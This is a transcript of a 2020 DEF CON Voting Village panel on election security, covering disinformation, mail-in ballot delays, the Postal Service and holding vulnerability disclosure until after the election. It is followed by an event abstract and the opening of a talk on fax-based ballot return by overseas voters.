I'll step into the fire. I think an interesting thing that I've seen is that, yes, when we did our panel back in early February, which seems like so long ago now, I think that we could pretty clearly say, like, Russia. We were seeing the Twitter bots, the farms, we were seeing the disinformation campaigns on Facebook, Twitter, IG. Now it's much more complicated. So the interesting things that we've seen now are, well, I feel like it's interesting because I'm a social media nerd, the QAnon accounts that have popped up seem to span the gamut of countries. And you see a lot of activity from these QAnon accounts just coming from the US, and they're not some complex combative nation state. They're from just, like, diehard MAGA people who are like, I'm going to do my duty and this is patriotic, and they are figuring out how to spin up bots. And so that's pretty interesting. And then to see bots that'll respond to Trump accounts, right? Or the interesting thing that I see a lot, too, are accounts that get a lot of followers because they'll post pornography, right? And then they get loads of followers and then they get verified in some cases. And then as soon as they get the check mark, they switch to, like, QAnon accounts that give themselves some name that you can recognize in the media.
And all of a sudden you think you're engaging with someone that you're not engaging with. But what that does is give this celebrity or verified boost to this misinformation. So for me, as a person who has a blue check mark, I want to say: I don't know anything. I'm not an expert on any fucking thing. And I'm going to tell you flat out that you'd be hard pressed to find a blue check mark that is an expert on everything. So if someone gets their blue check mark for being an actress, like, maybe don't just immediately trust that they're an expert on vaccination protocol, right? So I think that it's really fascinating how the floods are coming, and the stuff that Cambridge Analytica did, it's all still happening under a different name, a different company, but it's all still out there on Facebook and Twitter. It's just that now more people from different countries, including our own, are able to participate in the disinformation process.

Yeah, I'll tag in on that. Just to confirm what you're saying, the QAnon stuff and things of that nature, they're happening on the ground here in Australia. I think for ostensibly different reasons from a partisan political standpoint, but it's kind of coming from the same mindset. And I think in part, like, we're all going a bit stir crazy right now. It's good not to ignore the fact that society in general is dealing with mental stress that we've not seen collectively for as long as Twitter's been around, definitely. So weird shit happens. But yeah, there's that piece of it. I think, Kim, you touched on a really good point. I actually got invited to talk about disinformation with a friend who has a cooking channel. She's got, like, millions and millions of subscribers, but she saw basically bot-generated, advertising-focused content ripping off her stuff. And then noticed that there was subversion starting to creep into that, and the ability for that type of channel to be used. It's so crazy, it's nuts, man.
Like, it was, and I'm like, what am I doing on a cooking channel? This is crazy. But no, they have an entire channel on this, like, basically debunking some of these bots or the content farms. Yeah, it's a real thing. And I think the ability for that sort of thing to be deployed very rapidly, because these are businesses. It's businesses that exploit the things that are exploitable to build following on social media in some of the ways that Kim had just described, but then they sell that or rent that, or they're owned, you know, potentially by an actor that can go hostile. It's really played into that. And that's happening across all sorts of different channels. The one you asked, Emily, about, you know, things that we can do. I think something that we can all agree on is The Great Hack, for example, just as a, you know, a way to get people that aren't necessarily technical into a context that's apolitical. So you're not sort of going one way or the other too much. You're just explaining to them this general idea that, like, social media is a constructed reality that's been built just for you, and you actually need to be observing it like that. I think, you know, for the hackers that are kind of watching this, that's probably a thesis and something that's important that we could all agree on. And I found that to be fairly helpful.

And just to talk briefly on foreign disinformation, of course, that's a very large concern. We've seen in 2016 what happened, and in 2020 it seems to be shaping up again. We know, yes, our nation's adversaries, Russia, China, Iran, are all trying to interfere in our democratic processes. So from CISA's perspective, our number one priority is to ensure that Americans decide American elections.
So that means ensuring that foreign adversaries are not able to interfere, whether that's by actually targeting election systems or whether that's disinformation campaigns; it should be Americans who are deciding American elections.

So that kind of leads us to the point, then: what steps can Americans take to mitigate the impact, say, of disinformation, or just general confusion, say, on election night?

I think the most important thing here is just to understand that elections are going to be different this year. Election night, November 3rd, is not going to be the same as election night in the past, because with many more mail-in ballots, they're going to take much longer to count, just due to state laws and processes around that, as well as just technical constraints, since some states are rapidly scaling out mail-in ballots at a scale that is maybe tenfold what they previously had set up. So with that perspective, on election night it is entirely possible that it just isn't final what the election results are. And it may take a week, it may take several weeks, to actually learn what the final results are. So the best thing that Americans can do is to just internalize this, understand that election results are not going to come out immediately. The media has a part in all of this, too: it can't just be election night, final results, clear who won, because we have to acknowledge that might not be the case. So I think that if we all are on the same page expecting this to be a slower process, and keeping in mind that a slower process means that there's more time to actually verify that results are correct and to ensure that the final count is ultimately the right one. So I think just understanding that patience is needed here, and that on election night we're not going to know who won. It may take some time, but we'll get there, and we can be confident then in the outcome of the election. That's the important thing.
Yeah, and just to follow up on what Jack said: election night is not the end of this. For starters, any kind of disinformation campaign that we've been talking about, that's going to happen way before election day. Like I mentioned, I get to vote on October 13th, so look for something exciting happening around, I don't know, the first to second week of October. That's the time when your fear ganglia should flare up around what's going to be happening with disinformation. And just one other super quick point: Jack is also totally correct that I would be shocked if we had results election night. Now, it doesn't mean it's the end of democracy. There will not be rioting in the streets over this. We've done this before. Some people on this call are old enough to remember the 2000 election, and we remember that that was weeks and weeks and weeks of will-they-won't-they, which ended up in a Supreme Court decision. So that did not destroy America, and not having election results at 1am on November 4th is not going to kill everybody. We'll be fine. We'll be fine.

Yeah, that does bring up a good point, or a subsequent question here, kind of talking about some of the logistical errors. To put on an election is not as easy as everybody kind of thinks, like you just go in there and pull the handle if it's a manual machine. It is way more complicated. Just watching Matt Blaze's Twitter feed sometimes, and just how simplistic some of the suggestions are, and of course Matt being Matt fires back in Matt's way, and that's not a knock on him. It's just to try to educate people that this shit ain't simple. As much as I railed on my trip to the DMV recently, I sat in the car and kind of pondered everything required to kind of make my trip better, and I'm just like, oh my God, that's a lot to move. That's Sisyphean in a way.
But obviously one of our bigger challenges, obviously the thing that made the biggest press right after our February conclave here, was the Iowa caucus. I wrote a long paper on this about the whole DevOps process in regards to how it was developed. But then there were the Georgia primaries, which some would say were kind of a predictable outcome of what kind of a cluster fuck it would be. But the other issue is that they underscore the potential for how trust is eroded through procedural process error, by no fault or intent of the creator of that error. It was more or less: we're forging new areas of elections, things we can do, and mistakes will be made. There was no necessarily evidence, when looked at, that interference occurred. But when these things that we do, to put it not so nicely, shit the bed, what are the different ways that we can, as professionals in the security and election security arena, kind of capture the discussion and say: this shouldn't erode trust. This is us trying something new. Mistakes will be made. Morale will be lowered. But what are some things at the technical level? As I mentioned, you have a lot of technical people that will swoop in and say, oh, we can fix this with this; it's so glibly joked about. But what are some practical techniques we can use to kind of educate people, like, no, no, no, this is a big ship to steer, this is what you can expect, don't lose trust in this?

Great. So first, just to really underscore the point that running elections is incredibly hard. There's so much more than just, kind of from a voter's perspective, showing up to, say, a polling place and casting your ballot. There's so much more that goes into this process, so many months of preparation. That's a difficult task.
And every single election official I've talked to is incredibly motivated and wants to make sure that elections run smoothly and that their people can, in a free and fair manner, decide who will win the election. So just thinking back to February, say: it was already shaping up to be perhaps one of the hardest elections that election officials have had to run, just because we are in an incredibly polarized environment. We know that there was foreign interference that occurred in 2016, and we can expect it again in 2020. So even from that perspective, this was a hard task. And then you add the pandemic, and everything becomes so much more complicated, because suddenly we can't vote entirely in the same way as we're used to voting, and all of these processes have to change. In a lot of cases, like I said, election officials now have to scale out mail-in ballots at ten times the capacity. And when your machines that process those were only intended to handle, say, a small percentage of voters in your jurisdiction, from a technical perspective that can be very difficult, and things can break, because we're rapidly scaling out these technologies and things can and likely will go wrong. So from that perspective, what should voters expect? Like I said before, be patient; election results may not come in immediately, and that's fine. I think the second point there is really to expect things to go wrong, but don't immediately believe that that is a result of interference of any kind, because the most likely explanation is that it's just some routine error that occurred and that will be worked through. There are processes in place in order to handle these types of failures. We have, for the most part, paper trails that allow verifying elections. So from that perspective, we have controls in place. And yes, technology can be brittle and stuff can break down.
But a lot of times, just look for the most likely explanation. Of course, interference is still possible, and we should be very concerned if that does happen. But just looking at what is most likely to happen, we can almost assume that some technical failure in some capacity will occur, but that doesn't mean it's malicious. And people just have to view it that way and understand that there are still controls in place.

Yeah, Occam's razor is good. I can't remember if it's Hanlon's razor or Occam's razor, but it's one of the razors. It's Hanlon's. Yeah, anyway. Yeah, it's the one about not assuming malice, anyway, whatever. We can probably look that one up after the fact, now that I'm outing myself as not knowing which razor is which right now.

I've got two. First: no new stuff in 2020, like, time out. There's a whole bunch of innovation happening in the election space, which I think is fantastic, and I think it's important. It's going to be critical after this is done. But it's the addition of variables, and the idea that software fails, which is the second point I'm going to make. The failure rate of software is directly proportional to how quickly it's been brought to market and oftentimes how mature it is. So this idea of, like, cool, let's just blast 2020 with a whole bunch of brand new stuff that we haven't really tested: ultimately, when you go back to Iowa and do a bit of a root cause analysis, that's sort of most of what happened there. It was less than six weeks old when I did the analysis. Yeah. And it's logically what would happen again if we do the same with other stuff. So: no new stuff. But then this other idea of software fails, in terms of, again, coming back to how we can help. Humans make mistakes, period.
This is why we've got an industry: because while we come up with all these incredible ways to do stuff, including democracy itself, we do make the occasional spelling error, and then there are bad people that want to manipulate that to get what they want. So this idea of, like, to err is human; it's more about how you respond. Again, it's part of what I like so much about vulnerability disclosure as a process, but also as this, like, leading indicator of maturity when it comes to the security of an organization that can translate to trust. I think that's a concept that isn't very well understood. And I think a lot of the time people, you know, on the operations side would prefer to just do ostrich risk management and pretend it didn't exist. But I think it's going to become pretty important in the context of all of the stuff that can and probably will go a bit funky this year.

Casey, you have some of the best vulnerability disclosure jargon around. I love it.

I've been practicing. Yeah, a little.

Yeah, like, I guess I would just say, as technical people, who are probably the only people watching this: you know, I think you can do your part by not freaking the hell out when you see something that goes wrong. Like, you know, just to echo Jack and Casey, it is a Hanlon's razor kind of thing. There will probably be mistakes. You know, I don't think I would go so far as to say, like... I've got a disclosure shirt on; it's very hard for me to say, like, don't disclose vulnerabilities. But, you know, maybe not on Election Day, and maybe don't make a bunch of hay about, like, hackable voting machines. Like, that is kind of the least of our worries. If all we had to worry about was a hackable voting machine, like that physical device, boy, that would imply that we've fixed so many other problems in infrastructure, in disinformation, in everything up and down the line.
So, you know, I would hope that the folks that work in the space, who pay attention to things in Voting Village, you know, maybe not completely lose your cool over a, you know, a voting machine that can be hacked in person.

So I'll do a quick response, and I'm sure Emily wants to move on. But this goes back to something that I said in February. And it's a recurring theme, because I feel like I say it a lot. So if you've heard it before, suck it up, because I'm going to say it again. The biggest disservice that we can do to the American people as security professionals is somehow convincing them that their votes don't count. And we do that by constantly preaching that the system's broken, the voting machines are hackable, the infrastructure is flawed, the voter registration system is, you know, something that can be tampered with. It's not to say these things aren't true. But also, like, you have to qualify those ramblings and announcements with how often that actually happens and what the likelihood of that happening actually is. And the idea that, you know, hacking 20 voting machines is going to sway an election, without even acknowledging what it would take to actually hack the voting machine, right? Or to tamper with a voter registration system without acknowledging that, like, you know, states do have some IDS systems in place. Like, sure, could it happen? Yeah, we can "what if" all day long. But if we're putting information out there that even makes one person think, well, my vote can just be changed anyway, so why would I bother voting? Like, then we've fucked up, like, bad, because we've kind of shot ourselves in the foot with the thing that we were trying to make better.

So we're now in Section B. We've now pivoted from where we were six months ago to where we find ourselves in the last 90 days here.
90 days scares me because, you know, coming from the federal government, it takes longer than that mainly to fill out the paperwork for something. So 90 days for us in the real world, in the commercial sector, will be totally interesting. But obviously, I'm going to highlight the fact that, you know, as Jack laid out here, CISA has taken more of an active policy and assistance role for states. The Election Assistance Commission has hired some really great new staff, in fact, some folks who I believe Kim and I were on a panel with many years ago. And, you know, the feeling is, while it's awesome they hired these people, I don't know, I've tweeted out about it, it's a little too late in certain cases. But, you know, they hired great people. What is the feeling right now that these folks can actually make a difference between now and the election? Or obviously, if we can't do it by then, what is the change that can be made for further elections, provided that the world isn't going to melt down?

Yeah, so I think I can take this to start. So it's true, yeah, CISA has brought on some more people to help out with election security. I'm part of a group of me and four other Stanford students who all came to CISA to work specifically on election security. And we've been having a lot of fun being able to work essentially on both the infrastructure component, building tools to allow organizations to better secure their systems and allow CISA to, say, aid in assessments for state and local election officials, as well as working on some of that, say, foreign disinformation component. So in terms of what both, say, CISA and the EAC can do by November, I think there's a lot that can still be done. Of course, yes, we have calculated this, I think it's 89 days from the time this talk is airing until the election. And that's very little time, almost nothing. But we still can do a lot.
We can help, say, states identify vulnerabilities in their systems. We continue to offer services that assess these systems and give guidance. I mentioned before, we have documents that we published along with the Election Assistance Commission. And we're working to support states in the capacity that we can. So I think that there's a lot that still, of course, needs to be improved, but we're getting there. And from my perspective, yes, the federal government plays a large role in this, and I'd say this is one of the major improvements since 2016. In 2016, the federal government's involvement with the states was not at all near where it is today. So much has improved since then that we are now working with each of the 50 states, we're working with a significant portion of the local election offices, and we're in a much better place, both in terms of protecting systems and monitoring in case stuff does go wrong.

So, you know, you speak to obviously kind of the involvement with CISA and, you know, kind of the states taking a more active role in their own survival, in a way. You know, have any of the vendors, either of the e-poll books or the election systems, been more willing to kind of come forward and work proactively with the government, or, you know, say, any of the companies represented on here, to kind of solve the problems? I know, you know, I've recently been involved with some workshopping with the OECD in regards to vulnerability disclosure policies and digital product security. And one of those cases is finding a good mediator sometimes to kind of do that. Has anybody kind of moved that way, or are we still kind of, like, you know, finger pointing and moving forward there?

So in terms of CISA's involvement with this, of course, CISA's preference is for vulnerabilities to be disclosed either directly to the state or to vendors when that is possible.
And it's certainly true that vulnerability disclosure policies can be very helpful in this process. I'm not aware of any vendors, at the time of recording, or states for that matter, that have come out with vulnerability disclosure policies; that could very well change in the two weeks before this airs. But what we do offer is resources for those that want to implement vulnerability disclosure policies to do so. So like I mentioned, we have our guide on vulnerability disclosure that will be live by the time this panel airs, as well as the fact that we do serve as a last resort for people who are unable to disclose vulnerabilities for any reason. They can report it to US-CERT, which is under CISA, and we will work to get that disclosed to the vendor in order to mitigate that vulnerability. So CISA does play an important role here. And yeah, it is our hope that, of course, any vulnerabilities that people come to vendors with, or come to us with, will be addressed.

So, I mean, just to follow up on that, we're getting under the wire, at the wire, right, for the November 2020 election. If I were the king of vulnerability disclosure, I think I would direct people to disclose to you personally, Jack, and, you know, by extension, CISA, before vendors and states. Like, I mean, I think that's kind of the way. Like, let's say I'm sitting on a vulnerability, or I find a vulnerability in some election system or whatever, and I'm a hacker who's wrestling with this. Like, I have it. I don't want to not tell anyone about it. You know, there is this whole "it's okay to yell fire in a crowded theater if the theater is actually on fire" business. I think it's probably not great to, like, drop that on Twitter and just full disclose and do that. I mean, that's not helpful, I don't think, in the slightest.
But I do think, like, you tell me: my instinct is, you know, tell CISA and hope for the best and keep my mouth shut until November 10th or 15th or something. You know, at least that's something they can do.

I'm describing your job at you.

Yeah, you can do instrumentation, right? Like, so even if there are no fixes, there are still ways to track the vulnerability.

Yeah, and you're exactly right there, that yes, the priority is for the vulnerability to get fixed as quickly as possible, and we want to support whatever will make that happen efficiently and smoothly. So of course it's ideal if it is possible to disclose directly to vendors, but that is hard when there are no disclosure policies today. In that case, yes, exactly: given the current landscape, CISA does serve a coordinating role there. For people who can't really find the contact to disclose, they can come to CISA, and CISA will work to make sure that the vendor or the state is made aware and that the vulnerability can be fixed.

Yeah, I mean, hard agree with Todd's suggestion of going to CISA, especially at this point, keeping in mind as well that, like, with the 90-day kind of lead time that we've got, the vendors are very likely to be distracted and have lots of other things on their plate just from a pure logistical standpoint, before you go layering on the pandemic and the fact that 2020 is generally a bit of a shit show. You know, the thing that I wanted to double click on is actually around basically nondisclosure of findings ahead of November at this point. And this is very much opposed to how I normally talk about vuln disclosure. It's very hard to say; I want things to run. Yeah, it's a really difficult thing to say. We actually talked about this in terms of the boilerplate election policy that we put up on disclose.io, and we've got it in there.
It's, like, you know, basically the agreement is not to disclose until after the election is finished. Ordinarily, that timeline would serve as back pressure on the vendors to fix, and I think that's a really good and important thing for accountability and transparency. But the risk of frightening a non-technical voter into just giving up and not showing up to the poll booth, as a product of trying to do something good, I think is extremely high on this particular topic at this particular point in time. So yeah, it's a hard pill to swallow, I think, for security researchers in general. It was definitely, you know, from what we do and where I sit, a hard thing to say, but I actually do think it's the right thing for this year.

Yeah. Yeah, I know that's one of those things. With some of the policy making, you know, obviously federal, international, we've set what I wouldn't necessarily call an artificial 90-day deadline, but obviously inside the 90 days it does kind of create an unworkable framework, both in the timing, the regulatory environment for whatever folks need to do for certifications, plus loading all the election information, the logistics of that. So, you know, it just creates this whirlwind of not a good situation for us to be in.

So yeah, we talked about this, you know, earlier in regards to kind of the effect that COVID-19 has had on how we staff the election, how we are attending the election and participating in it, obviously with retirees and whatnot. There are so many dumpster fires being poured into the alley right now, it's not even funny. And obviously with the disinformation and just all the stuff we talked about: if you are all betting people, and if we were in Las Vegas this year instead of doing this virtually, what would you bet to be the first thing to crumble out of all of this?
What do you think is the first thing where it's just, like, you know, the guy from Oz comes out from behind the sheet and says, yep, everybody go home, we're fucked?

Um, if I was a gambling person, which I'm not: if we're talking about the first thing to just go, like, shit house on fire, I think what we'd see is a bunch of maybe rebellious folks who show up at polling places without masks and, like, fake cough and just make a big to-do and just try to disrupt, you know, the peaceful line at the voting place. Right? Like, sure, I think we'll see people tweeting, oh, I got a mail-in ballot for my uncle who died last year, and then it gets 10,000 retweets, and then somebody else tweets something similar. Like, I think we'll see that. But just for shit-house election day, like, what are we going to see on the news? I think, like, polling places being disbanded for, like, civil unrest, and not from the folks who are there just to vote peacefully.

So this is starting to form like a John Carpenter movie in the worst way possible, then.

Well, I am a horror fan, so of course that's where I go. My hope is that people respect democracy, regardless of which side of the line you fall on, and just let people have their constitutional right to participate in the electoral process. However, I am currently disenchanted by the state of the country right now.

I don't know, I think that your first sign of everything going to hell is going to be in, like, the neighborhood of October 13th, October 14th. That's going to be where you have your last big push of whatever disinformation campaign is going on. I'm not a disinfo expert by any means, but if I were going to own stuff, I would definitely want to tell people. Like, one of the tactics we've seen over and over again from people who are attacking election systems is that it's no good unless you tell people about it, unless you get noticed.
And so you've got to get noticed, like, early enough to sway elections, but not so early that there's enough time, you know, that Jack can fix it for us. So, like, October 15th, I think, is the sweet spot for that. What is that, like a Wednesday or Thursday? Anyway, early October, I would expect to see big news, to try to have that last push of, hey guys, don't bother voting.

And you think that because that's when the mail-in voting window opens?

That's when, in many states, absentee ballots are starting to get filled out, early voting starts then, and it's still early enough that you can make hay about it for the following two weeks. Like, a losing side can call cyber foul pointing at that thing and just eat up news for the rest of October.

Just, this is, you know, it's a bit personal, but it goes to one of the reasons that I'm not in the US right now. We had the option to be near family and ride out the pandemic, and, you know, part of the concern that was in the back of my mind was how, you know, the potential for civil unrest and those sorts of things is amplified by the backdrop of the pandemic and economic depression and all that other stuff. So I think the number of things that are available for an actor to tweak on, and the amount of leverage that's present, you know, as we do version two of this panel, is radically different to what it was, you know, last time we got together. So, you know, from a mitigation standpoint, it really does come back, for the typical audience of this panel and DEF CON, to making sure that you're not adding to the problem, you know, the whole idea of polarization, of just general distrust, like, nihilism, that sort of stuff.
And I do believe, like, we are talking, you know, Armageddon-ish type stuff at the moment, but I do believe fundamentally in, like, working back from the worst case scenario and then optimizing the critical path from there. So it's an important conversation to have. Yeah, that's a good segue into the last question we're going to do today. So, you know, obviously we talked about mail-in voting as the next best mitigation for forcing people to show up in person, and definitely a better alternative than, I'd say, any potential half-baked e-voting solution that would come swooping in at the last minute. But obviously, with the rhetoric that's been, you know, spoken by various folks in the press, from various levels of government and elsewhere, about the validity and trustability of the Postal Service, as well as their own financial woes imposed upon them by Congress and pre-funding and so forth and so on. You know, it was just announced today that they had worked out a deal with a massive infusion slash loan from the U.S. Treasury. I think it was like $15 billion, which is a huge chunk of change. It does keep people from necessarily having to rush out and, you know, run for stamps. But obviously I have reports from some of the locals here in the D.C. area, specifically Baltimore, about potential fallout from the recent Postmaster General coming in and saying, please delay first-class mail. Obviously that puts downward pressure on delivery of mail-in voting, as well as, you know, returning that and making sure that everyone hits the deadlines with the postmarks. So where we sit here, our last best effort to run a secure election is the Postal Service. It is in dire straits. It has leadership that is potentially working antithetically against the, essentially, constitutionally enshrined state that the Postal Service exists in. What are the last bits here, how can we ensure that it keeps functioning for us going forward?
Are there ways that maybe we move up early voting even sooner so that we kind of play into the logistics of extended timelines? Is it write your senators and make sure that mail is delivered in a timely fashion? Or, you know, some other aspect of it? And with that, especially, as you mentioned earlier too, I think it was Todd talking about the expected timelines being a lot longer for us to hear the outcomes. You know, if we have this extended timeline, what are our expectations to actually, you know, hear what the outcomes are going to be? I mean, it would be great if states would extend their deadlines. I was shocked to see that Texas, for all the hand-wringing Texas has been doing about mail-in ballots and trying to make that hard, the fact that Texas then turned around and extended early voting was a sweet surprise. You know, I don't know. We do things randomly here in Texas. Some things are great. Some things are not so much. But I guess that's just here locally in Texas. I don't know. I feel like everyone should mentally hug a postal worker today. They do a lot of really hard work. A lot of people depend on them for a lot of things. You know, they are in fact constitutionally enshrined. It's an Article 1 power of Congress to establish the post office. And the fact that it became a target for disenfranchisement is just mind-boggling to me. But I think that we can all agree that the post office is kind of a wonderful Americanism, really. Like, this notion of a single stamp that carries something across the country. I'm not really sure, it might be an English thing, it might be a British thing, but one or the other, it's pretty great. So, yeah, like, I mean, if you have the opportunity to vote absentee, absolutely do it.
You know, absentee voting, you can get all nerdy about it and say, like, well, technically you're violating the secrecy of the ballot by doing that, because someone can watch you vote and direct your vote and see that you vote correctly and see that you put the thing in and mail it away. But that is so low on my list of problems when it comes to democracy, vote selling. You know, if it turns out that's a big deal, great, let's go tackle that. But it is not; that has not been a problem since, like, the 19th century. So, yeah. I want to say too, we've seen the current administration actively attack the postal service on social media. And so, you know, I would ask folks to understand, I don't think there was a long game there, but I don't think that it's going to be unreasonable to see more attacks on the postal service from the current administration. The unreliability, the conspiracies about deals with Amazon, and then how Jeff Bezos ties into Amazon and then into the Clintons; like, there's a lot of stuff to unpack there. But I would say, you know, at the end of the day, these folks are feds; they took the same oath to the Constitution that other feds take. They're there to just do their jobs every day. And the idea that postal workers themselves would be tampering with mail-in ballots is just kind of ridiculous. It's completely insane. It really is ridiculous. And if there were one, it's a blip on the radar given the numbers of folks voting, right? So let's just keep it all in perspective. And to understand the importance of the postal service: when I was younger, the DMV test had a question that said, if you get to a four-way stop and there's a fire truck, an ambulance, a police car, and a mail truck, who has the right of way?
And everyone assumed, like, the ambulance or the fire truck, but it was, in fact, the mail truck, because they are protected under, you know, the guise of the federal government. Obviously a mail truck wouldn't go first, but they could. And also, if you hit a mail truck, you get into a lot of trouble too, because you've damaged federal property. So, you know, you probably don't want to go out and take your angst out on vandalizing mail trucks or bothering the postal workers. So I just... That is a hot tip. I feel like... robbing post offices used to be a hanging crime. Yeah. Well, there's also that Crime a Day book that just came out from the Twitter feed. I would hope that there's a chapter in there about weird stuff like that. So, all right. Then, last thoughts on what we see as our future here. What you'll be doing, what you hope others will be doing, and then where do you hope we will be? I can go ahead and take this first. So yeah, nothing I'm going to say here really is anything new, I would say, that I haven't said. But yes, in terms of what I'm doing, what CIS is doing: we are going to be working through and after the election to support election offices at the state and local level to ensure that they have what they need from a security perspective. And we're committed to doing that. In terms of, I think, what's maybe more valuable is what people watching this can do, what steps they can take and what steps they can recommend others to take. And this goes back to the two points: that you have to be patient, and you have to expect that things may go wrong, but that doesn't necessarily mean there has been interference, and that doesn't mean that the election is invalid. So be patient. Do not assume that results will come out on election day.
It may take some time, but have faith that election officials are doing their best to have an accurate result, and that we have processes in place so that if interference does occur, we can identify it. And ultimately, the main thing is that the people of America need to have faith in their own elections, and that can go away without any actual tampering occurring, without any interference. If the people do not believe that their result was valid, then the result is not valid. So I think, to everyone watching this: just understand that what you believe happened matters, and understand there are processes in place, there are committed election officials, and the federal government is here to support that process. And yeah, let's hope that we have a smooth, free and fair election in November. Sure, so I guess to just kind of reiterate what everyone else has said, the best defense against any election shenanigans is voting, and voting in numbers that are too hard to push one way or the other. If people go and they vote, especially people who have historically been disenfranchised or haven't felt the need to go vote... you hear it at every election, but this election is literally the most important election of your life so far. So go vote, and hopefully, if enough people do that, any kind of shenanigans will be drowned out by the overwhelming signal that we have. Me personally, not only am I going to vote early, I'm very excited to do that, but I'll be working the polls. It's going to be crazy. It'll be November and there will be no vaccine. And so I will be doing a lot of cleaning and hoping that not too many polls close that day. You know, there have been poll closures. In our last election here in Texas, there weren't any poll closures, like, on the day of. You know, people did show up; they got enough recruits to come and do the thing. I did have a couple poll workers not come to my polling place, but we had enough people to pull it off. So hopefully that will remain the case.
But that's going to be November, so who knows what the pandemic will bring us. If it becomes impossible to vote in person in any kind of crowded way, then we'll just have to deal with that as it comes. But if you have the bandwidth and the health to throw in for what is a super fun, sounds boring but is actually pretty fun, like, 14-hour go, go work the polling place. I'll go next. I will say that I'm very much looking forward to returning to the U.S., and this is honestly a part of that. So again, not speaking to the subject matter, but speaking to it from a very personal standpoint: it's like my adopted country is trying to figure all of this stuff out, and I'm looking forward to being past it. It's a heavy thing. So aside from that, practically, you know, for the hackers: find out where people are asking for help, and go help them. Like, look for the stuff that people have already volunteered for, you know, the volunteering stuff that we talked about at the start, just to reiterate that. Some of that help, you might have to go looking for it. See if you can find opportunities to provide your skills in those different areas. Help out on the open source projects and some of the other things that are going on that have been volunteered. We mentioned before the verified voting stuff; it's up on GitHub, go bang on the source code. And if it's legit, say so. If there's a problem, submit a PR, help make it better. If these audits are a part of how we have a peaceful kind of acknowledgement of the count after the fact, then you'll have played a pretty big role in that, I think. And then finally, you know, don't scare your grandma between now and November. If you're doing security research and you find something, you know, talk to Jack and the crew at CIS, try to talk to the vendor.
Just be very mindful of the fact that dropping anything that looks like a vulnerability on the internet right now is highly, highly exploitable by actors from a disinformation standpoint. And that's going to be part of the problem. Technically, you have a last couple of days, because July sucked when it came to vulns, or at least people had to clean up after vulns. So let's make August better. We can. It's DEF CON month, so the internet's on fire this month anyway, but maybe after that, I don't know. October: let's let October be quiet then. That's cool. Kimber, any last thoughts? It's unprecedented, so it's anyone's guess what actually happens on election day and in the months following. Um, vote, just vote. Tell your friends, tell your family: vote, vote safely, um, vote mail-in if you can. If you pay attention, your state or your district may have deadlines on when you have to let them know that you're going to be voting by mail-in ballot. Some folks here didn't understand there was a two-part process to mail-in ballots: you had to request one to receive one; it didn't automatically get sent to you. So just be aware of how your local districts work when it comes to mail-in ballots so that you can participate. And if you have to go to the polls, you know, wear a mask, social distance. And if you can, and you don't have high-risk folks at home, volunteer at your local polling places and do what you can to make it safe for our most vulnerable populations to be able to get out and have their voices heard. Well, yeah, that's a great thing to end on. You know, obviously I have a spouse who's immunocompromised, so, you know, I preemptively requested a mail-in ballot. But I know some states require an extenuating excuse in order to get an absentee ballot. So please check with your local officials on what you can do there.
Obviously, you know, safe and secure voting is important, but safe and secure also applies to individuals as well. With that, I'll close out our panel. I do appreciate Kimber, Jack, Casey and Todd for joining us this evening for the recording. Again, this is the election security panel part two, The Infrastructure Strikes Back. While I can't necessarily drop in some John Williams here, use your mind's eye as well as the starfield background to kind of get you through. And hopefully come November, we'll see what kind of shakes out, and, geez, maybe next February we'll have a cleanup on this, maybe a part three. Hopefully it doesn't end up with a bunch of Ewoks running around saying "yub nub," but anyhow. Once again, thank you very much and thank you for your time. And take care.
Democracy is the cornerstone of America's Constitution, identity, and ideology, and this foundation was shaken during the 2016 Presidential Election. Four years later, we still have great lengths to go to ensure that the integrity of the 2020 Presidential Election, and any election moving forward, is protected. In February, this panel convened to discuss the threats and challenges that were present and might arise between then and the November election. We discussed the intersection of people, technology, security, and elections, with a focus on themes including: - The true scope of the problem when it comes to "hacking elections" - The biggest threats to the 2020 vote – threat modeling for disinformation, voting machine vulnerabilities, website hacking, and election manipulation - The role of hackers and coordinated vulnerability disclosure in building voter trust and improving cyber-resilience - The impact for elections in the West at large, driven by the U.S.'s prominence as the champion for democracy. However, we did not know that a pandemic and constantly changing rhetoric by candidates and government leaders, along with several court cases, primaries, and other events, would add even more challenges for the 2020 election. We will discuss what can be done in the 90 days left between now and the election, what can feasibly be helped by the public, governments, and others to ensure a secure and valid election, as well as what will need to be carried forward as lessons learned.
10.5446/50768 (DOI)
Hi, Voting Village. My name is Forrest Senty. I'm the Director of Business and Government Affairs at the National Cybersecurity Center. I'm Caleb Gardner. I'm a fellow at the National Cybersecurity Center in Colorado Springs. And we're going to be presenting you our Hack-a-Fax presentation today. For a little background to start, the National Cybersecurity Center is a 501(c)(3) center in Colorado Springs. A lot of our focus has to do with cyber innovation and awareness, and a lot of our projects have to do with tackling global problems, whether that comes in smart cities, elections, or space. Some of our colleagues in the Space ISAC are presenting today in the Aerospace Village. We want to give them good congratulations and a shout out over there. But the big reason why we're here today ultimately is that we want to talk about the gap, the security gap, and specifically it has to do with policy in addition to different agencies and groups. A lot of people ask, why NCC? Why us? Why do we care about some of these issues? And the reality is that between the different groups that exist in the United States, which are multi-agency, multi-party, multi-policy depending on where you come from, whether it's the EI-ISAC, groups like Verified Voting, MIT, even places like the EAC, CISA, and CIS, each serves a specific segment. But our focus is on identifying gaps in critical infrastructure. And the presentation you're going to be hearing from us today is going to be talking about that gap. One gap we've identified specifically has to do with the population of overseas voters, or UOCAVA voters. This is specific to the Uniformed and Overseas Citizens Absentee Voting Act. For many of you here at the Voting Village, this is going to be no secret or surprise. You know what this means, you know how many people are affected, and, you know, the different challenges these people face, whether they're voting from Afghanistan or Italy, or even from a remote jungle in the Amazon.
So a lot of what we're focused on today is on this area. One of the three pieces I want to call out is specific to fax machines, like we mentioned earlier on. Under the current implementation of the MOVE Act that was established in 2009, 31 states currently allow for ballot return via email and fax. This means that these 31 states have to provide a way for people who are voting from overseas to send their ballot back via fax or email. So knowing this information, and seeing the different research that was coming out, we wanted to do a quick breakdown and see how many ballots were actually transmitted back in 2018. According to the EAC, roughly 29,000 ballots were sent. Now, this falls under the category of "other," so some of these could be mobile voting, like from West Virginia, or a web portal, like in Colorado, Montana, Arizona, or Michigan. But 29,000 ballots, although not statistically significant compared to the rest of the United States, still represents a population that is voting using this method. And this shows that election offices are still allowing this method, and even pushing for it in some cases. Although it has been on the decline, it's important to know that security is still paramount for every single vote that comes in. So now I'll hand it over to Caleb; he's going to talk a little more about the research that we did specific to fax machines in election jurisdictions and give you a little more of the issue at hand. Thanks, Forrest. So first off, we're going to reference you guys back to some presentations that probably made an impression on you when you first saw them. They were specifically focused on fax and printer-faxes. First off, at DEF CON 26, we saw Faxploit from Check Point Research, and that was a big sticking point for me, and we came back to it a lot as we went to do 